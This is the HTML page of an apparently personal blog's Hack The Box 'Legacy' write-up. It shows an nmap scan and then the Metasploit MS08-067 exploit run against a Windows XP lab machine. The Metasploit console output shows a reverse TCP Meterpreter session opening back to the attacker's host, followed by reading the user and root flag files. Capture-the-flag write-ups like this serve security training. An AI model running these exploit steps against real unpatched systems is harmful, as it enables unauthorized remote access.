<!DOCTYPE html>


<html lang="en-us" data-theme="">
<head>
    
        
<meta charset="utf-8">
<meta name="HandheldFriendly" content="True">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="referrer" content="no-referrer-when-downgrade">

<title>Hackthebox: Legacy - ins3cure.com</title>
<meta name="description" content="You&#39;d better check your S3 buckets before someone else does">

<link rel="icon" type="image/x-icon" href="https://ins3cure.com/favicon.ico">
<link rel="apple-touch-icon-precomposed" href="https://ins3cure.com/favicon.png">
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">


<script async src="https://www.googletagmanager.com/gtag/js?id=UA-168677970-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-168677970-1');
</script>




    





    
    
    

    
        <link rel="stylesheet" href="https://ins3cure.com/css/style.77f677c827f6d28cc36d9ebc5df12e45faaaf5475aa067dd6cc0c0485817a99c.css" integrity="sha256-d/Z3yCf20ozDbZ68XfEuRfqq9UdaoGfdbMDASFgXqZw=">
    





    





    
    
    

    
        <link rel="stylesheet" href="https://ins3cure.com/css/style.c6fed49e746b6647061b86d63e3ffc352542c1c94153560619db0da4f976fca2.css" integrity="sha256-xv7UnnRrZkcGG4bWPj/8NSVCwclBU1YGGdsNpPl2/KI=">
    





<meta property="og:title" content="Hackthebox: Legacy" />
<meta property="og:description" content="HTB legacy box writeup. It&rsquo;s a very easy machine, just need to find a well known vulnerability." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://ins3cure.com/htb/legacy/" /><meta property="og:image" content="https://ins3cure.com/images/og-featured.png"/><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2020-12-06T20:56:01+01:00" />
<meta property="article:modified_time" content="2020-12-06T20:56:01+01:00" />


<meta name="twitter:card" content="summary_large_image"/>
<meta name="twitter:image" content="https://ins3cure.com/images/og-featured.png"/>

<meta name="twitter:title" content="Hackthebox: Legacy"/>
<meta name="twitter:description" content="HTB legacy box writeup. It&rsquo;s a very easy machine, just need to find a well known vulnerability."/>










<script async src="https://www.googletagmanager.com/gtag/js?id=G-18687JCG0Q"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-18687JCG0Q');
</script>



    
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/cookieconsent@3/build/cookieconsent.min.css" />

</head>
<body>
    <a class="skip-main" href="#main">Skip to main content</a>
    <div class="container">
        <header class="common-header"> 
            
                <h1 class="site-title">
    <a href="/"><span class="cursor">% </span>ins3cure.com</a><span class="logo_cursor"></span>
</h1>

    <nav>
        
        
        <a class="" href="https://ins3cure.com/categories/" title="Categories">Categories</a>
        
        <a class="" href="https://ins3cure.com/tags/" title="Tags">Tags</a>
        
    </nav>


            
        </header>
        <main id="main" tabindex="-1"> 
            
    
    
    <article class="post">
        <header class="post-header">
            <h1 class="post-title">Hackthebox: Legacy</h1>
    </header>
    

    


<div class="post-info">
    
    <div class="post-date">Posted Sunday, Dec 6, 2020</div>
    

    <div class="post-taxonomies">
        
            <ul class="post-tags">
                
                    <li><a href="https://ins3cure.com/tags/ctf">#ctf</a></li>
                
                    <li><a href="https://ins3cure.com/tags/hacking">#hacking</a></li>
                
                    <li><a href="https://ins3cure.com/tags/htb">#htb</a></li>
                
            </ul>
        
    </div>
</div>

        <div class="content">
            <p>HTB legacy box writeup. It&rsquo;s a very easy machine, just need to find a well known vulnerability.</p>
<p>As usual, let&rsquo;s start with a <code>nmap</code> scan:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell"><span style="color:#75715e"># nmap -T4 -A -v 10.10.10.4</span>

PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
</code></pre></div><p>Google for windows xp sp3 exploit smb:</p>
<p>We have the famous MS08-067! Let&rsquo;s try it&hellip;</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">msf5 &gt; search ms08-067
 
Matching Modules
<span style="color:#f92672">================</span>
 
   <span style="color:#75715e">#  Name                                 Disclosure Date  Rank   Check  Description</span>
   -  ----                                 ---------------  ----   -----  -----------
   <span style="color:#ae81ff">0</span>  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption
 
 
msf5 &gt; use exploit/windows/smb/ms08_067_netapi
msf5 exploit<span style="color:#f92672">(</span>windows/smb/ms08_067_netapi<span style="color:#f92672">)</span> &gt; show options
 
Module options <span style="color:#f92672">(</span>exploit/windows/smb/ms08_067_netapi<span style="color:#f92672">)</span>:
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host<span style="color:#f92672">(</span>s<span style="color:#f92672">)</span>, range CIDR identifier, or hosts file with syntax <span style="color:#e6db74">&#39;file:&lt;path&gt;&#39;</span>
   RPORT    <span style="color:#ae81ff">445</span>              yes       The SMB service port <span style="color:#f92672">(</span>TCP<span style="color:#f92672">)</span>
   SMBPIPE  BROWSER          yes       The pipe name to use <span style="color:#f92672">(</span>BROWSER, SRVSVC<span style="color:#f92672">)</span>
 
 
Exploit target:
 
   Id  Name
   --  ----
   <span style="color:#ae81ff">0</span>   Automatic Targeting
 
 
msf5 exploit<span style="color:#f92672">(</span>windows/smb/ms08_067_netapi<span style="color:#f92672">)</span> &gt; set rhosts 10.10.10.4
rhosts <span style="color:#f92672">=</span>&gt; 10.10.10.4
msf5 exploit<span style="color:#f92672">(</span>windows/smb/ms08_067_netapi<span style="color:#f92672">)</span> &gt; run
 
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Started reverse TCP handler on 10.10.14.15:4444
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> 10.10.10.4:445 - Automatically detecting the target...
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack <span style="color:#ae81ff">3</span> - lang:English
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> 10.10.10.4:445 - Selected Target: Windows XP SP3 English <span style="color:#f92672">(</span>AlwaysOn NX<span style="color:#f92672">)</span>
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> 10.10.10.4:445 - Attempting to trigger the vulnerability...
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Sending stage <span style="color:#f92672">(</span><span style="color:#ae81ff">176195</span> bytes<span style="color:#f92672">)</span> to 10.10.10.4
<span style="color:#f92672">[</span>*<span style="color:#f92672">]</span> Meterpreter session <span style="color:#ae81ff">1</span> opened <span style="color:#f92672">(</span>10.10.14.15:4444 -&gt; 10.10.10.4:1032<span style="color:#f92672">)</span> at 2020-06-22 12:56:10 -0400
 
meterpreter &gt;
</code></pre></div><p>Exploit is trivial, we have a meterpreter session:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">meterpreter &gt; sysinfo
Computer        : LEGACY                                                                                                                                                      
OS              : Windows XP <span style="color:#f92672">(</span>5.1 Build 2600, Service Pack 3<span style="color:#f92672">)</span>.                                                                                                                
Architecture    : x86                                                                                                                                                         
System Language : en_US                                                                                                                                                       
Domain          : HTB                                                                                                                                                         
Logged On Users : <span style="color:#ae81ff">1</span>                                                                                                                                                           
Meterpreter     : x86/windows                                                                                                                                                 
 
 
meterpreter &gt; pwd                                                                                                                                                             
C:<span style="color:#ae81ff">\D</span>ocuments and Settings<span style="color:#ae81ff">\A</span>dministrator<span style="color:#ae81ff">\D</span>esktop                                                                                                                               
 
meterpreter &gt; ls
Listing: C:<span style="color:#ae81ff">\D</span>ocuments and Settings<span style="color:#ae81ff">\A</span>dministrator<span style="color:#ae81ff">\D</span>esktop
<span style="color:#f92672">========================================================</span>
 
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  <span style="color:#ae81ff">32</span>    fil   2017-03-16 02:18:19 -0400  root.txt
 
meterpreter &gt; cat root.txt
99***13
 
 
meterpreter &gt; cd ..
meterpreter &gt; cd ..
meterpreter &gt; pwd
C:<span style="color:#ae81ff">\D</span>ocuments and Settings
meterpreter &gt; ls
Listing: C:<span style="color:#ae81ff">\D</span>ocuments and Settings
<span style="color:#f92672">==================================</span>
 
Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  <span style="color:#ae81ff">0</span>     dir   2017-03-16 02:07:20 -0400  Administrator
40777/rwxrwxrwx  <span style="color:#ae81ff">0</span>     dir   2017-03-16 01:20:29 -0400  All Users
40777/rwxrwxrwx  <span style="color:#ae81ff">0</span>     dir   2017-03-16 01:20:29 -0400  Default User
40777/rwxrwxrwx  <span style="color:#ae81ff">0</span>     dir   2017-03-16 01:32:52 -0400  LocalService
40777/rwxrwxrwx  <span style="color:#ae81ff">0</span>     dir   2017-03-16 01:32:42 -0400  NetworkService
40777/rwxrwxrwx  <span style="color:#ae81ff">0</span>     dir   2017-03-16 01:33:41 -0400  john
 
meterpreter &gt; cd john
lmeterpreter &gt; ls
Listing: C:<span style="color:#ae81ff">\D</span>ocuments and Settings<span style="color:#ae81ff">\j</span>ohn
<span style="color:#f92672">=======================================</span>
 
Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   <span style="color:#ae81ff">0</span>       dir   2017-03-16 01:33:41 -0400  Application Data
40777/rwxrwxrwx   <span style="color:#ae81ff">0</span>       dir   2017-03-16 01:33:41 -0400  Cookies
40777/rwxrwxrwx   <span style="color:#ae81ff">0</span>       dir   2017-03-16 01:33:41 -0400  Desktop
40555/r-xr-xr-x   <span style="color:#ae81ff">0</span>       dir   2017-03-16 01:33:41 -0400  Favorites
40777/rwxrwxrwx   <span style="color:#ae81ff">0</span>       dir   2017-03-16 01:33:41 -0400  Local Settings
40555/r-xr-xr-x   <span style="color:#ae81ff">0</span>       dir   2017-03-16 01:33:41 -0400  My Documents
100666/rw-rw-rw-  <span style="color:#ae81ff">524288</span>  fil   2017-03-16 01:33:41 -0400  NTUSER.DAT
100666/rw-rw-rw-  <span style="color:#ae81ff">1024</span>    fil   2017-03-16 01:33:41 -0400  NTUSER.DAT.LOG
40777/rwxrwxrwx   <span style="color:#ae81ff">0</span>       dir   2017-03-16 01:33:41 -0400  NetHood
40777/rwxrwxrwx   <span style="color:#ae81ff">0</span>       dir   2017-03-16 01:33:41 -0400  PrintHood
40555/r-xr-xr-x   <span style="color:#ae81ff">0</span>       dir   2017-03-16 01:33:41 -0400  Recent
40555/r-xr-xr-x   <span style="color:#ae81ff">0</span>       dir   2017-03-16 01:33:41 -0400  SendTo
40555/r-xr-xr-x   <span style="color:#ae81ff">0</span>       dir   2017-03-16 01:33:41 -0400  Start Menu
40777/rwxrwxrwx   <span style="color:#ae81ff">0</span>       dir   2017-03-16 01:33:41 -0400  Templates
100666/rw-rw-rw-  <span style="color:#ae81ff">178</span>     fil   2017-03-16 01:33:42 -0400  ntuser.ini
 
meterpreter &gt; cd Desktop
meterpreter &gt; ls
Listing: C:<span style="color:#ae81ff">\D</span>ocuments and Settings<span style="color:#ae81ff">\j</span>ohn<span style="color:#ae81ff">\D</span>esktop
<span style="color:#f92672">===============================================</span>
 
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  <span style="color:#ae81ff">32</span>    fil   2017-03-16 02:19:32 -0400  user.txt
 
meterpreter &gt; cat user.txt
e6***4f
 
 
meterpreter &gt; 
</code></pre></div>
        </div>
    </article>

    
        
    <div class="pagination post-pagination">
        <div class="left pagination-item ">
            
                <a href="/posts/htb-devel/">← Hackthebox: devel</a>
            
        </div>
        <div class="right pagination-item ">
            
                <a href="/caffeinate/">Caffeinate →</a>
            
        </div>
    </div>

    

    
        <div id="disqus_thread"></div>
<script type="application/javascript">
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "ins3cure-com" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
    


        </main>
        
            <footer class="common-footer">
    
    

    <div class="common-footer-bottom">
        
        <div class="copyright">
            <p>Mandatory legal stuff:
            <a href="/legal">Legal notice</a> · 
            <a href="/privacy">Privacy policy</a> · 
            <a href="/cookies">Cookie policy</a><br>
            © ins3cure.com, 2022 · <a href="/about">About us</a><br>
            Powered by <a target="_blank" rel="noopener noreferrer" href="https://gohugo.io/">Hugo</a>, theme based on <a target="_blank" rel="noopener noreferrer" href="https://github.com/mitrichius/hugo-theme-anubis">Anubis</a>.
            </p>  
        </div> 

        

    



    <button class="theme-switcher">
        Dark theme
    </button>

    <script>
    const STORAGE_KEY = 'user-color-scheme'
    const defaultTheme = "auto"

    let currentTheme
    let switchButton
    let autoDefinedScheme = window.matchMedia('(prefers-color-scheme: dark)')

    const autoChangeScheme = e => {
        currentTheme = e.matches ? 'dark' : 'light'
        document.documentElement.setAttribute('data-theme', currentTheme)
        changeButtonText()
    }

    document.addEventListener('DOMContentLoaded', function() {
        switchButton = document.querySelector('.theme-switcher')
        currentTheme = detectCurrentScheme()
        if (currentTheme == 'dark') {
            document.documentElement.setAttribute('data-theme', 'dark')
        }
        if (currentTheme == 'auto') {
            autoChangeScheme(autoDefinedScheme);
            autoDefinedScheme.addListener(autoChangeScheme);
        }
        changeButtonText()
        switchButton.addEventListener('click', switchTheme, false)
    })

    function detectCurrentScheme() {
        if (localStorage.getItem(STORAGE_KEY)) {
            return localStorage.getItem(STORAGE_KEY)
        } 
        if (defaultTheme) {
            return defaultTheme
        } 
        if (!window.matchMedia) {
            return 'light'
        } 
        if (window.matchMedia('(prefers-color-scheme: dark)').matches) {
            return 'dark'
        }
        return 'light'
    }

    function changeButtonText()
    {   
        switchButton.textContent = currentTheme == 'dark' ?  "Light theme" : "Dark theme"
    }

    function switchTheme(e) {
        if (currentTheme == 'dark') {
            localStorage.setItem(STORAGE_KEY, 'light')
            document.documentElement.setAttribute('data-theme', 'light')
            currentTheme = 'light'
        } else {
            localStorage.setItem(STORAGE_KEY, 'dark')
            document.documentElement.setAttribute('data-theme', 'dark')
            currentTheme = 'dark'
        }
        changeButtonText()
    }
    </script>
   
    </div>
</footer>

        
    </div>
    <script src="https://cdn.jsdelivr.net/npm/cookieconsent@3/build/cookieconsent.min.js" data-cfasync="false"></script>
<script>
window.cookieconsent.initialise({
  "palette": {
    "popup": {
      "background": "#252e39"
    },
    "button": {
      "background": "#14a7d0"
    }
  },
  "theme": "classic",
  "content": {
    "message": "This website uses cookies to ensure you get the best experience on our website",
    "dismiss": "Got it!",
    "link": "Learn more",
    "href": "/cookiepolicy"
  }
});
</script>
</body>
</html>
